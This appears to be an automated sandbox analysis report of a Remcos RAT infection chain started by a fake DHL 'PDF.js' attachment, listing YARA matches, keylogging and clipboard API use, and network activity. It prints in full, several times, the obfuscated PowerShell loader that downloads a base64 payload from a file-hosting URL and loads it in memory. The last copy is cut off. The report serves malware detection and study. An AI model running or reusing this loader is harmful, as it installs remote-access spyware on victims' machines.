          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49717 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49718 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.5:49762 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 193.30.119.105:443 -> 192.168.2.5:49802 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 37.27.124.176:443 -> 192.168.2.5:49837 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Contains functionality to register a low level keyboard hook
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00409340 SetWindowsHookExA 0000000D,0040932C,000000008_2_00409340
          Installs a global keyboard hook
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,8_2_0040A65A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,8_2_00414EC1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,8_2_0040A65A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00409468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,8_2_00409468

          E-Banking Fraud

          barindex
          Yara detected Remcos RAT
          Source: Yara matchFile source: 2.2.powershell.exe.16f1056dd48.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.powershell.exe.16f1056dd48.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.powershell.exe.16f115cf6e8.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.3527390495.0000000001208000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3525134792.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2452741154.0000016F102FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6968, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5600, type: MEMORYSTR

          Spam, unwanted Advertisements and Ransom Demands

          barindex
          Contains functionalty to change the wallpaper
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0041A76C SystemParametersInfoW,8_2_0041A76C

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 2.2.powershell.exe.16f1056dd48.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 2.2.powershell.exe.16f1056dd48.5.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 2.2.powershell.exe.16f1056dd48.5.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
          Source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
          Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
          Source: 2.2.powershell.exe.16f1056dd48.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 2.2.powershell.exe.16f1056dd48.5.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 2.2.powershell.exe.16f1056dd48.5.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
          Source: 2.2.powershell.exe.16f115cf6e8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 2.2.powershell.exe.16f115cf6e8.6.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
          Source: 00000008.00000002.3525134792.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 00000008.00000002.3525134792.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 00000008.00000002.3525134792.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
          Source: 00000002.00000002.2452741154.0000016F102FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: Process Memory Space: powershell.exe PID: 6968, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: Process Memory Space: powershell.exe PID: 6968, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: Process Memory Space: MSBuild.exe PID: 5600, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Windows Scripting host queries suspicious COM object (likely to drop second stage)
          Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
          Wscript starts Powershell (via cmd or directly)
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))"Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess Stats: CPU usage > 49%
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,8_2_00414DB4
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF84868A80D2_2_00007FF84868A80D
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF84875092C2_2_00007FF84875092C
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF84875329C2_2_00007FF84875329C
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848751B892_2_00007FF848751B89
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004251528_2_00425152
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004352868_2_00435286
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004513D48_2_004513D4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0045050B8_2_0045050B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004365108_2_00436510
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004316FB8_2_004316FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0043569E8_2_0043569E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004437008_2_00443700
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004257FB8_2_004257FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004128E38_2_004128E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004259648_2_00425964
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0041B9178_2_0041B917
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0043D9CC8_2_0043D9CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00435AD38_2_00435AD3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00424BC38_2_00424BC3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0043DBFB8_2_0043DBFB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0044ABA98_2_0044ABA9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00433C0B8_2_00433C0B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00434D8A8_2_00434D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0043DE2A8_2_0043DE2A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0041CEAF8_2_0041CEAF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00435F088_2_00435F08
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00402073 appears 51 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00432B90 appears 53 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00432525 appears 41 times
          Source: DHL RPA GRBP Template.PDF.jsInitial sample: Strings found which are bigger than 50
          Source: 2.2.powershell.exe.16f1056dd48.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 2.2.powershell.exe.16f1056dd48.5.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 2.2.powershell.exe.16f1056dd48.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 2.2.powershell.exe.16f1056dd48.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 2.2.powershell.exe.16f1056dd48.5.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 2.2.powershell.exe.16f1056dd48.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 2.2.powershell.exe.16f115cf6e8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 2.2.powershell.exe.16f115cf6e8.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 00000008.00000002.3525134792.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 00000008.00000002.3525134792.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 00000008.00000002.3525134792.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 00000002.00000002.2452741154.0000016F102FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: Process Memory Space: powershell.exe PID: 6968, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: Process Memory Space: powershell.exe PID: 6968, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: Process Memory Space: MSBuild.exe PID: 5600, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winJS@10/6@5/5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,8_2_00415C90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0040E2E7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,8_2_0040E2E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00419493 FindResourceA,LoadResource,LockResource,SizeofResource,8_2_00419493
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_00418A00
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\FsssIAil[1].txtJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\gig-G7MMFK
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5312:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2276:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jswxq4qq.jz0.ps1Jump to behavior
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: DHL RPA GRBP Template.PDF.jsReversingLabs: Detection: 37%
          Source: DHL RPA GRBP Template.PDF.jsVirustotal: Detection: 37%
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL RPA GRBP Template.PDF.js"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, 